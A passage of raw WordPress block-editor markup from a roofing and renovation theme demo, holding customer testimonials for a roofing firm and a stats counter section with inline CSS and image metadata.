style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n 